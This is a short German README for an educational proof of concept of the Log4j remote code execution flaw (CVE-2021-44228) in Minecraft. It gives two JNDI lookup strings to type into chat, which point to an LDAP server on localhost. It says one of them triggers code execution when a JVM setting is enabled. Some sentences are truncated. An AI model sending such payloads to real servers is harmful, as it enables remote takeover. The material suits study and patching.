
Ein pädagogischer Proof of Concept für die Log4j-Schwachstelle (CVE-2021-44228) in Minecraft
Dieses Projekt dient nur zu Bildungszwecken.
Dies ist ein Proof of Concept der Log4j-RCE, adaptiert von HyCraftHD.
Hier sind einige Links für CVE-2021-44228:
Dieser Fehler betrifft nahezu alle log4j2- und möglicherweise auch log4j1-Versionen. Die empfohlene Version ist 2.15.0, die den Exploit behebt.
${jndi:ldap://127.0.0.1/e} in den Chat ein. Wenn ein offener Socket auf Port 389 vorhanden ist, versucht logj4 sich zu verbinden und blockiert die weitere Kommunikation, bis ein Timeout eintritt.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, ein serialisiertes String-Objekt vom LDAP-Server.
${jndi:ldap://127.0.0.1/exe} in den Chat ein. Wenn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true auf true gesetzt ist, wird die Remote Code Execution ausgelöst.